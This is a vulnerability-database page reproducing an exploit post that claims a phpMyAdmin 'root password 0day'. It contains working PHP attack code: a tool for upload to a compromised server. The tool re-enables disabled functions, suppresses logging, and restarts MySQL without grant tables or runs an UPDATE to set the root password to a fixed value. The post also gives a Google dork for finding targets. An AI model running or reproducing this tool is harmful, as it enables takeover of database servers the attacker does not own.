Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpMyAdmin Root Password 0day

🗓️ 08 Aug 2011 00:00:00Reported by PiasterType 
zdt
 zdt🔗 0day.today👁 102 Views

phpMyAdmin Root Password 0day exploit vulnerability and too

Code

                     .-"""-.
                    / .===. \
                    \/ 6 6 \/
                    ( \___/ )
  ______________ooo__\_____/__________________
 /                                             \
|           __  __  ___                        |
|        /|  _)  _)   /_| _       _ _  _       |
|         | __) __)  /(_|(_|\/.  (_(_)|||      |
|                           /                  |
| $3ll:      G5 (W.DLL) version 1.5            |
| author:    Piaster  (wadelamin)              |
| E-mail:    [email protected]                    |
| copyright: 2010-2011                         |
| Page:http://www.facebook.com/Pias.Piaster    |
 \___________________________ooo______________/
                    |  |  |
                    |_ | _|
                    |  |  |
                    |__|__|
                    /-'P'-\
                   (__/ \__)

# Exploit Title: [phpMyAdmin Root Password]
# Date: [21/6/2011]
# Home: 1337day.com
# Author: [Piaster (wadelamin)]
# phpmyadmin: Software Link: [www.appservnetwork.com ||www.phpmyadmin.net]
# Version: [all phpmyadmin Version]
# Category:: [remote, local]
# Google dork: [inurl:phpMyAdmin ||  The AppServ Open Project - [all Version] for Windows ]
# Tested on: [Windows & unix]
# E-mail: [email protected]
# Page: http://www.facebook.com/Pias.Piaster



File Bug:
//-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------//

echo "Welcome to AppServ MySQL Root Password Reset Program\n\n";

AppServCMD();

function AppServCMD() {
	define('STDIN',fopen("php://stdin","r"));
	echo " Enter New Password : ";
	$input = trim(fgets(STDIN,256));
	$input = ereg_replace('\"', "\\\"", $input);
	$input = ereg_replace('\'', "\'", $input); 
	echo "\n   Please wait ...................................\n\n";
	exec ("net stop mysql");
	exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');

//You can add a password and then request the file via the browser

	exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\"");
	exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown");
	sleep(3);
	exec ("net start mysql");
}
//--------------------------------END-----------------------------------//



I've modified the file and then request the file from abroad
But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script
And then request the file via the browser

There Important Note:
If the Windows server can access phpMyAdmin immediately 
if the file to complete the process this means that 
it is restarted the Mysql and then change the password.




//---------------------------------Exploit the vulnerability tool------------------------//
<?
echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px  gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>';

@set_time_limit(0);
@ini_restore("safe_mode");
@ini_restore("allow_url_fopen");
@ini_restore("open_basedir");
@ini_restore("disable_functions");
@ini_restore("safe_mode_exec_dir");
@ini_restore("safe_mode_include_dir");

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);

$win = strtolower(substr(PHP_OS,0,3)) == "win";
if(function_exists('exec')){$pias = exec;}
elseif(function_exists('shell_exec')){$pias = shell_exec;}
elseif(function_exists('system')) {$pias = system ;}
elseif(function_exists('passthru')) { $pias = passthru ;}

if($win) {
	define('STDIN',fopen("php://stdin","r"));
	$input = trim(fgets(STDIN,256));
	$input = ereg_replace('\"', "\\\"", $input);
	$input = ereg_replace('\'', "\'", $input); 
	echo "\n   Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster";
	$pias("net stop mysql");
	$pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
	$pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
	$pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
	sleep(3);
	$pias("net start mysql");} 

if(!$win) {
echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>';

if(isset($_REQUEST['pias'])){
    
$dbu = $_REQUEST['dbu'];
$dbp = $_REQUEST['dbp'];
$dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
$conn = @mysql_connect($dbh, $dbu, $dbp);
$select = @mysql_select_db('mysql', $conn);
if (!$select) {
echo @mysql_error();}
$t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
$go1 = @mysql_query( $t1 , $conn);
if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';}
else echo 'database mysql not acsses or not found ty agin';}}

echo '<br><br>By Piaster :: [email protected] :: '. $f ;

?> 
//---------------------------------Exploit the vulnerability tool end--------------------//



#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Aug 2011 00:00Current
7.1High risk
Vulners AI Score7.1
phpmyadminroot passwordexploitvulnerabilitytoolremotelocalwindowsunix
102